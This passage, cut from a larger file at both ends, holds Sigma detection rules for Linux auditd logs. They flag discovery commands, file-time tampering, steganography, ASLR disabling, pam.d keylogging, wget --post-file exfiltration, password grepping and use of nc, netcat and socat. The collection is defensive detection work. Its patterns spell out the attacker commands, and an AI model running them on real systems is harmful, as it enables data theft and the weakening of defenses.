references: - https://man7.org/linux/man-pages/man8/getcap.8.html - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ - https://mn3m.info/posts/suid-vs-capabilities/ - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 author: 'Pawel Mazur' date: 2021-11-28 modified: 2022-12-25 tags: - attack.discovery - attack.defense-evasion - attack.privilege-escalation - attack.t1083 - attack.t1548 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: getcap a1: '-r' a2: '/' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_change_file_time_attr.yml ================================================ title: File Time Attribute Change - Linux id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b status: test description: Detects file time attribute changes used to hide new files or changes to existing files. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md author: 'Igor Fits, oscd.community' date: 2020-10-15 modified: 2022-11-28 tags: - attack.defense-evasion - attack.t1070.006 logsource: product: linux service: auditd detection: execve: type: 'EXECVE' touch: - 'touch' selection2: - '-t' - '-acmr' - '-d' - '-r' condition: execve and touch and selection2 falsepositives: - Unknown level: medium simulation: - type: atomic-red-team name: Set a file's access timestamp technique: T1070.006 atomic_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 - type: atomic-red-team name: Set a file's modification timestamp technique: T1070.006 atomic_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 - type: atomic-red-team name: Modify file timestamps using reference file technique: T1070.006 atomic_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_chattr_immutable_removal.yml ================================================ title: Remove Immutable File Attribute - Auditd id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 status: test description: Detects removing immutable file attribute. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md author: Jakob Weinzettl, oscd.community date: 2019-09-23 modified: 2022-11-26 tags: - attack.defense-evasion - attack.t1222.002 logsource: product: linux service: auditd detection: selection: type: 'EXECVE' a0|contains: 'chattr' a1|contains: '-i' condition: selection falsepositives: - Administrator interacting with immutable files (e.g. for instance backups). 
level: medium simulation: - type: atomic-red-team name: Remove immutable file attribute technique: T1222.002 atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_clipboard_collection.yml ================================================ title: Clipboard Collection with Xclip Tool - Auditd id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf status: test description: | Detects attempts to collect data stored in the clipboard from users with the usage of the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations. references: - https://linux.die.net/man/1/xclip - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ author: 'Pawel Mazur' date: 2021-09-24 modified: 2022-11-26 tags: - attack.collection - attack.t1115 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: xclip a1: - '-selection' - '-sel' a2: - clipboard - clip a3: '-o' condition: selection falsepositives: - Legitimate usage of xclip tools level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_clipboard_image_collection.yml ================================================ title: Clipboard Collection of Image Data with Xclip Tool id: f200dc3f-b219-425d-a17e-c38467364816 status: test description: | Detects attempts to collect image data stored in the clipboard from users with the usage of the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations. 
references: - https://linux.die.net/man/1/xclip author: 'Pawel Mazur' date: 2021-10-01 modified: 2022-10-09 tags: - attack.collection - attack.t1115 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: xclip a1: - '-selection' - '-sel' a2: - clipboard - clip a3: '-t' a4|startswith: 'image/' a5: '-o' condition: selection falsepositives: - Legitimate usage of xclip tools level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_coinminer.yml ================================================ title: Possible Coin Miner CPU Priority Param id: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed status: test description: Detects command line parameter very often used with coin miners references: - https://xmrig.com/docs/miner/command-line-options author: Florian Roth (Nextron Systems) date: 2021-10-09 modified: 2022-12-25 tags: - attack.privilege-escalation - attack.t1068 logsource: product: linux service: auditd detection: cmd1: a1|startswith: '--cpu-priority' cmd2: a2|startswith: '--cpu-priority' cmd3: a3|startswith: '--cpu-priority' cmd4: a4|startswith: '--cpu-priority' cmd5: a5|startswith: '--cpu-priority' cmd6: a6|startswith: '--cpu-priority' cmd7: a7|startswith: '--cpu-priority' condition: 1 of cmd* falsepositives: - Other tools that use a --cpu-priority flag level: critical ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_data_compressed.yml ================================================ title: Data Compressed id: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee status: test description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md author: Timur Zinniatullin, oscd.community date: 2019-10-21 modified: 2023-07-28 tags: - attack.exfiltration - attack.collection - attack.t1560.001 logsource: product: linux service: auditd detection: selection1: type: 'execve' a0: 'zip' selection2: type: 'execve' a0: 'gzip' a1: '-k' selection3: type: 'execve' a0: 'tar' a1|contains: '-c' condition: 1 of selection* falsepositives: - Legitimate use of archiving tools by legitimate user. level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_data_exfil_wget.yml ================================================ title: Data Exfiltration with Wget id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc status: test description: | Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. references: - https://linux.die.net/man/1/wget - https://gtfobins.github.io/gtfobins/wget/ author: 'Pawel Mazur' date: 2021-11-18 modified: 2022-12-25 tags: - attack.exfiltration - attack.t1048.003 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: wget a1|startswith: '--post-file=' condition: selection falsepositives: - Legitimate usage of wget utility to post a file level: medium ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_dd_delete_file.yml ================================================ title: Overwriting the File with Dev Zero or Null id: 37222991-11e9-4b6d-8bdf-60fbe48f753e status: stable description: Detects overwriting (effectively wiping/deleting) of a file. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md author: Jakob Weinzettl, oscd.community date: 2019-10-23 tags: - attack.impact - attack.t1485 logsource: product: linux service: auditd detection: selection: type: 'EXECVE' a0|contains: 'dd' a1|contains: - 'if=/dev/null' - 'if=/dev/zero' condition: selection falsepositives: - Appending null bytes to files. - Legitimate overwrite of files. level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_file_or_folder_permissions.yml ================================================ title: File or Folder Permissions Change id: 74c01ace-0152-4094-8ae2-6fd776dd43e5 status: test description: Detects file and folder permission changes. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md author: Jakob Weinzettl, oscd.community date: 2019-09-23 modified: 2021-11-27 tags: - attack.defense-evasion - attack.t1222.002 logsource: product: linux service: auditd detection: selection: type: 'EXECVE' a0|contains: - 'chmod' - 'chown' condition: selection falsepositives: - User interacting with files permissions (normal/daily behaviour). 
level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_find_cred_in_files.yml ================================================ title: Credentials In Files - Linux id: df3fcaea-2715-4214-99c5-0056ea59eb35 status: test description: 'Detecting attempts to extract passwords with grep' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md author: 'Igor Fits, oscd.community' date: 2020-10-15 modified: 2023-04-30 tags: - attack.credential-access - attack.t1552.001 logsource: product: linux service: auditd detection: selection: type: 'EXECVE' keywords: '|all': - 'grep' - 'password' condition: selection and keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_hidden_files_directories.yml ================================================ title: Hidden Files and Directories id: d08722cd-3d09-449a-80b4-83ea2d9d4616 status: test description: Detects adversary creating hidden file or directory, by detecting directories or files with . 
as the first character references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md author: 'Pawel Mazur' date: 2021-09-06 modified: 2025-06-16 tags: - attack.defense-evasion - attack.t1564.001 logsource: product: linux service: auditd detection: selection_commands: type: 'EXECVE' a0: - 'mkdir' - 'nano' - 'touch' - 'vi' - 'vim' selection_arguments: - a1|re: '(^|\/)\.[^.\/]' - a2|re: '(^|\/)\.[^.\/]' condition: all of selection_* falsepositives: - Unknown level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_hidden_zip_files_steganography.yml ================================================ title: Steganography Hide Zip Information in Picture File id: 45810b50-7edc-42ca-813b-bdac02fb946b status: test description: Detects appending of zip file to image references: - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ author: 'Pawel Mazur' date: 2021-09-09 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1027.003 logsource: product: linux service: auditd detection: commands: type: EXECVE a0: cat a1: a1|endswith: - '.jpg' - '.png' a2: a2|endswith: '.zip' condition: commands and a1 and a2 falsepositives: - Unknown level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_masquerading_crond.yml ================================================ title: Masquerading as Linux Crond Process id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 status: test description: | Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process author: Timur Zinniatullin, oscd.community date: 2019-10-21 modified: 2023-08-22 tags: - attack.defense-evasion - attack.t1036.003 logsource: product: linux service: auditd detection: selection: type: 'execve' a0: 'cp' a1: '/bin/sh' a2|endswith: '/crond' condition: selection level: medium ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_modify_system_firewall.yml ================================================ title: Modify System Firewall id: 323ff3f5-0013-4847-bbd4-250b5edb62cc related: - id: 53059bc0-1472-438b-956a-7508a94a91f0 type: similar status: test description: | Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this. 
references: - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html - https://blog.aquasec.com/container-security-tnt-container-attack - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking author: IAI date: 2023-03-06 modified: 2025-10-12 tags: - attack.t1562.004 - attack.defense-evasion logsource: product: linux service: auditd detection: selection1: type: 'EXECVE' a0: 'iptables' a1|contains: 'DROP' selection2: type: 'EXECVE' a0: 'firewall-cmd' a1|contains: 'remove' selection3: type: 'EXECVE' a0: 'ufw' a1|contains: 'delete' selection4: type: 'EXECVE' a0: 'nft' a1|contains: - 'delete' - 'flush' condition: 1 of selection* falsepositives: - Legitimate admin activity level: medium ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_network_sniffing.yml ================================================ title: Network Sniffing - Linux id: f4d3748a-65d1-4806-bd23-e25728081d01 status: test description: | Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md author: Timur Zinniatullin, oscd.community date: 2019-10-21 modified: 2022-12-18 tags: - attack.credential-access - attack.discovery - attack.t1040 logsource: product: linux service: auditd detection: selection_1: type: 'execve' a0: 'tcpdump' a1: '-c' a3|contains: '-i' selection_2: type: 'execve' a0: 'tshark' a1: '-c' a3: '-i' condition: 1 of selection_* falsepositives: - Legitimate administrator or user uses network sniffing tool for legitimate reasons. level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_screencapture_import.yml ================================================ title: Screen Capture with Import Tool id: dbe4b9c5-c254-4258-9688-d6af0b7967fd status: test description: | Detects an adversary creating a screen capture of a desktop with the Import Tool. Using this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations. ImageMagick must be installed. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md - https://linux.die.net/man/1/import - https://imagemagick.org/ author: 'Pawel Mazur' date: 2021-09-21 modified: 2022-10-09 tags: - attack.collection - attack.t1113 logsource: product: linux service: auditd detection: import: type: EXECVE a0: import import_window_root: a1: '-window' a2: 'root' a3|endswith: - '.png' - '.jpg' - '.jpeg' import_no_window_root: a1|endswith: - '.png' - '.jpg' - '.jpeg' condition: import and (import_window_root or import_no_window_root) falsepositives: - Legitimate use of screenshot utility level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_screencaputre_xwd.yml ================================================ title: Screen Capture with Xwd id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c status: test description: Detects an adversary creating a screen capture of the full screen with xwd. Using this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture - https://linux.die.net/man/1/xwd author: 'Pawel Mazur' date: 2021-09-13 modified: 2022-12-18 tags: - attack.collection - attack.t1113 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: xwd xwd_root_window: a1: '-root' a2: '-out' a3|endswith: '.xwd' xwd_no_root_window: a1: '-out' a2|endswith: '.xwd' condition: selection and 1 of xwd_* falsepositives: - Legitimate use of screenshot utility level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_steghide_embed_steganography.yml ================================================ title: Steganography Hide Files with Steghide id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 status: test description: Detects embedding of files 
with usage of the steghide binary; adversaries may use this technique to prevent the detection of hidden information. references: - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ author: 'Pawel Mazur' date: 2021-09-11 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1027.003 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: steghide a1: embed a2: - '-cf' - '-ef' a4: - '-cf' - '-ef' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_steghide_extract_steganography.yml ================================================ title: Steganography Extract Files with Steghide id: a5a827d9-1bbe-4952-9293-c59d897eb41b status: test description: Detects extraction of files with usage of the steghide binary; adversaries may use this technique to prevent the detection of hidden information. references: - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ author: 'Pawel Mazur' date: 2021-09-11 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1027.003 logsource: product: linux service: auditd detection: selection: type: EXECVE a0: steghide a1: extract a2: '-sf' a3|endswith: - '.jpg' - '.png' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_susp_cmds.yml ================================================ title: Suspicious Commands Linux id: 1543ae20-cbdf-4ec1-8d12-7664d667a825 status: test description: Detects relevant commands often related to malware or hacking activity references: - Internal Research - mostly derived from exploit code including code in MSF author: Florian Roth (Nextron Systems) date: 2017-12-12 modified: 2022-10-05 tags: - attack.execution - attack.t1059.004 logsource: product: linux service: auditd detection: cmd1: type: 'EXECVE' a0: 
'chmod' a1: 777 cmd2: type: 'EXECVE' a0: 'chmod' a1: 'u+s' cmd3: type: 'EXECVE' a0: 'cp' a1: '/bin/ksh' cmd4: type: 'EXECVE' a0: 'cp' a1: '/bin/sh' condition: 1 of cmd* falsepositives: - Admin activity level: medium ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_susp_histfile_operations.yml ================================================ title: Suspicious History File Operations - Linux id: eae8ce9f-bde9-47a6-8e79-f20d18419910 status: test description: 'Detects commandline operations on shell history files' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md author: 'Mikhail Larin, oscd.community' date: 2020-10-17 modified: 2022-11-28 tags: - attack.credential-access - attack.t1552.003 logsource: product: linux service: auditd detection: execve: type: EXECVE history: - '.bash_history' - '.zsh_history' - '.zhistory' - '.history' - '.sh_history' - 'fish_history' condition: execve and history falsepositives: - Legitimate administrative activity - Legitimate software, cleaning hist file level: medium ================================================ FILE: rules/linux/auditd/execve/lnx_auditd_susp_service_reload_or_restart.yml ================================================ title: Service Reload or Start - Linux id: 2625cc59-0634-40d0-821e-cb67382a3dd7 status: test description: Detects the start, reload or restart of a service. 
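references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
author: Jakob Weinzettl, oscd.community, CheraghiMilad
date: 2019-09-23
modified: 2025-03-03
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1543.002
logsource:
    product: linux
    service: auditd
detection:
    # `systemctl|service <verb> ...` where the verb contains "start" (start, restart) or "reload"
    # (reload, reload-or-restart, ...). Both fields use substring matching, so a0 also matches
    # absolute paths such as /usr/bin/systemctl.
    selection:
        type: 'EXECVE'
        a0|contains:
            - 'systemctl'
            - 'service'
        a1|contains:
            - 'reload'
            - 'start'
    # `systemctl daemon-reload` only re-reads unit files; it was listed as a known false positive
    # and is excluded explicitly instead of being left to the analyst.
    filter_daemon_reload:
        a1: 'daemon-reload'
    condition: selection and not filter_daemon_reload
falsepositives:
    - Installation of legitimate service.
    - Legitimate reconfiguration of service.
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_system_shutdown_reboot.yml
================================================
title: System Shutdown/Reboot - Linux
id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f
status: test
description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.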
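references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
author: 'Igor Fits, oscd.community'
date: 2020-10-15
modified: 2022-11-26
tags:
    - attack.impact
    - attack.t1529
logsource:
    product: linux
    service: auditd
detection:
    execve:
        type: 'EXECVE'
    # Unbound keywords: the command name may appear in any argv position, which also covers
    # `systemctl reboot` / `systemctl poweroff`.
    shutdowncmd:
        - 'shutdown'
        - 'reboot'
        - 'halt'
        - 'poweroff'
    # `init 0|6` / `telinit 0|6`. The previous revision matched the runlevel as the unbound
    # keywords 0 and 6, which appear in virtually every audit record (timestamps, pids), so the
    # runlevel check was effectively a no-op; the arguments are now matched by position.
    init_runlevel:
        a0|endswith:
            - 'init'
            - 'telinit'
        a1:
            - '0'
            - '6'
    condition: execve and (shutdowncmd or init_runlevel)
falsepositives:
    - Legitimate administrative activity
level: informational
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_unzip_hidden_zip_files_steganography.yml
================================================
title: Steganography Unzip Hidden Information From Picture File
id: edd595d7-7895-4fa7-acb3-85a18a8772ca
status: test
description: Detects extracting of zip file from image file
references:
    - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
author: 'Pawel Mazur'
date: 2021-09-09
modified: 2022-10-09
tags:
    - attack.defense-evasion
    - attack.t1027.003
logsource:
    product: linux
    service: auditd
detection:
    commands:
        type: EXECVE
        a0: unzip
    # `unzip <file.jpg|png>` - an archive appended to an image is still readable by unzip.
    # Any unzip option before the file name (e.g. -d) shifts the path to a2 and evades the rule.
    a1:
        a1|endswith:
            - '.jpg'
            - '.png'
    condition: commands and a1
falsepositives:
    - Unknown
level: low
================================================
FILE: rules/linux/auditd/execve/lnx_auditd_user_discovery.yml
================================================
title: System Owner or User Discovery - Linux
id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3
status: test
description: |
    Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc.
    Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.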
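references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md
author: Timur Zinniatullin, oscd.community
date: 2019-10-21
modified: 2025-06-04
tags:
    - attack.discovery
    - attack.t1033
logsource:
    product: linux
    service: auditd
detection:
    # Exact a0 match on the bare command name; absolute-path invocations (/usr/bin/id) do not match.
    # These are everyday commands - the value of this rule is in correlation, not as a standalone alert.
    selection:
        type: 'EXECVE'
        a0:
            - 'hostname'
            - 'id'
            - 'last'
            - 'uname'
            - 'users'
            - 'w'
            - 'who'
            - 'whoami'
    condition: selection
falsepositives:
    - Admin activity
level: low
================================================
FILE: rules/linux/auditd/lnx_auditd_audio_capture.yml
================================================
title: Audio Capture
id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5
status: test
description: Detects attempts to record audio using the arecord and ecasound utilities.
references:
    - https://linux.die.net/man/1/arecord
    - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa
    - https://manpages.debian.org/unstable/ecasound/ecasound.1.en.html
    - https://ecasound.seul.org/ecasound/Documentation/examples.html#fconversions
author: Pawel Mazur, Milad Cheraghi
date: 2021-09-04
modified: 2025-12-05
tags:
    - attack.collection
    - attack.t1123
logsource:
    product: linux
    service: auditd
detection:
    # `arecord -vv -fdat <file>` exactly as in the referenced test; other flag spellings or
    # orders (`-f dat`, `-d 10 ...`) are not matched.
    selection_execve:
        type: EXECVE
        a0: arecord
        a1: '-vv'
        a2: '-fdat'
    # ecasound creating an anonymous in-memory file; needs a memfd_create syscall rule and
    # resolved syscall names (ausearch -i / log_format=ENRICHED) for the SYSCALL field to be a name.
    selection_syscall_memfd_create:
        type: SYSCALL
        exe|endswith: "/ecasound"
        SYSCALL: 'memfd_create'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: low
================================================
FILE: rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml
================================================
title: ASLR Disabled Via Sysctl or Direct Syscall - Linux
id: e497a24e-9345-4a62-9803-b06d7d7cb132
status: experimental
description: |
    Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including:
    - Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000)
    - Modification of the /proc/sys/kernel/randomize_va_space file
    - Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
    Disabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms.
    A successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.
references:
    - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/personality-syscall/README.md
    - https://man7.org/linux/man-pages/man2/personality.2.html
    - https://manual.cs50.io/2/personality
    - https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/
author: Milad Cheraghi
date: 2025-05-26
modified: 2025-12-05
tags:
    - attack.privilege-escalation
    - attack.defense-evasion
    - attack.t1562.001
    - attack.t1055.009
logsource:
    product: linux
    service: auditd
    definition: |
        Required auditd configuration (the SYSCALL field must be a resolved name, e.g. log_format=ENRICHED or ausearch -i):
        -a always,exit -F arch=b64 -S personality -k disable_aslr
        -a always,exit -F arch=b32 -S personality -k disable_aslr
        -w /proc/sys/kernel/randomize_va_space -p wa -k disable_aslr
        NOTE(review): confirm that a -w watch on this procfs entry is accepted by auditctl on your kernel; otherwise use a syscall rule with -F path=/proc/sys/kernel/randomize_va_space -F perm=w.
detection:
    # personality(ADDR_NO_RANDOMIZE). auditd prints a0 in hex without a 0x prefix, so 0x0040000
    # is logged as "40000". A persona that ORs other bits in (e.g. READ_IMPLIES_EXEC) will not
    # match this exact value.
    selection_syscall:
        type: 'SYSCALL'
        SYSCALL: 'personality'
        a0: 40000
    # `sysctl -w kernel.randomize_va_space=0`
    selection_sysctl:
        type: 'EXECVE'
        a0: 'sysctl'
        a1: '-w'
        a2: 'kernel.randomize_va_space=0' # 0 = disable
    # `sysctl kernel.randomize_va_space=0` - procps sysctl accepts key=value without -w.
    selection_sysctl_no_flag:
        type: 'EXECVE'
        a0: 'sysctl'
        a1: 'kernel.randomize_va_space=0'
    # Direct write to the procfs knob (`echo 0 > /proc/sys/kernel/randomize_va_space`), which the
    # description already lists; relies on the -w watch from the definition above. The written
    # value is not visible in the PATH record, so writes of 1 or 2 also match.
    selection_procfs_write:
        type: 'PATH'
        name: '/proc/sys/kernel/randomize_va_space'
    condition: 1 of selection_*
falsepositives:
    - Debugging or legitimate software testing
level: high
================================================
FILE: rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml
================================================
title: Linux Keylogging with Pam.d
id: 49aae26c-450e-448b-911d-b3c13d178dfc
status: test
description: Detect attempt to enable auditing of TTY input
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md
    - https://linux.die.net/man/8/pam_tty_audit
    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing
    - https://access.redhat.com/articles/4409591#audit-record-types-2
author: 'Pawel Mazur'
date: 2021-05-24
modified: 2022-12-18
tags:
    - attack.collection
    - attack.credential-access
    - attack.t1003
    - attack.t1056.001
logsource:
    product: linux
    service: auditd
detection: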
selection_path_events: type: PATH name: - '/etc/pam.d/system-auth' - '/etc/pam.d/password-auth' selection_tty_events: type: - 'TTY' - 'USER_TTY' condition: 1 of selection_* falsepositives: - Administrative work level: high ================================================ FILE: rules/linux/auditd/lnx_auditd_password_policy_discovery.yml ================================================ title: Password Policy Discovery - Linux id: ca94a6db-8106-4737-9ed2-3e3bb826af0a status: stable description: Detects password policy discovery commands references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md - https://linux.die.net/man/1/chage - https://man7.org/linux/man-pages/man1/passwd.1.html - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu author: Ömer Günal, oscd.community, Pawel Mazur date: 2020-10-08 modified: 2024-12-01 tags: - attack.discovery - attack.t1201 logsource: product: linux service: auditd detection: selection_files: type: 'PATH' name: - '/etc/login.defs' - '/etc/pam.d/auth' - '/etc/pam.d/common-account' - '/etc/pam.d/common-auth' - '/etc/pam.d/common-password' - '/etc/pam.d/system-auth' - '/etc/security/pwquality.conf' selection_chage: type: 'EXECVE' a0: 'chage' a1: - '--list' - '-l' selection_passwd: type: 'EXECVE' a0: 'passwd' a1: - '-S' - '--status' condition: 1 of selection_* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/linux/auditd/lnx_auditd_susp_c2_commands.yml ================================================ title: Suspicious C2 Activities id: f7158a64-6204-4d6d-868a-6e6378b467e0 status: test description: | Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. 
These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) references: - https://github.com/Neo23x0/auditd author: Marie Euler date: 2020-05-18 modified: 2021-11-27 tags: - attack.command-and-control logsource: product: linux service: auditd definition: | Required auditd configuration: -w /usr/bin/wget -p x -k susp_activity -w /usr/bin/curl -p x -k susp_activity -w /usr/bin/base64 -p x -k susp_activity -w /bin/nc -p x -k susp_activity -w /bin/netcat -p x -k susp_activity -w /usr/bin/ncat -p x -k susp_activity -w /usr/bin/ss -p x -k susp_activity -w /usr/bin/netstat -p x -k susp_activity -w /usr/bin/ssh -p x -k susp_activity -w /usr/bin/scp -p x -k susp_activity -w /usr/bin/sftp -p x -k susp_activity -w /usr/bin/ftp -p x -k susp_activity -w /usr/bin/socat -p x -k susp_activity -w /usr/bin/wireshark -p x -k susp_activity -w /usr/bin/tshark -p x -k susp_activity -w /usr/bin/rawshark -p x -k susp_activity -w /usr/bin/rdesktop -p x -k susp_activity -w /usr/local/bin/rdesktop -p x -k susp_activity -w /usr/bin/wlfreerdp -p x -k susp_activity -w /usr/bin/xfreerdp -p x -k susp_activity -w /usr/local/bin/xfreerdp -p x -k susp_activity -w /usr/bin/nmap -p x -k susp_activity (via https://github.com/Neo23x0/auditd/blob/ddf2603dbc985f97538d102f13b4e4446b402bae/audit.rules#L336) detection: selection: key: 'susp_activity' condition: selection falsepositives: - Admin or User activity level: medium ================================================ FILE: rules/linux/auditd/lnx_auditd_system_info_discovery.yml ================================================ title: System Information Discovery - Auditd id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 status: test description: Detects System Information Discovery commands references: - 
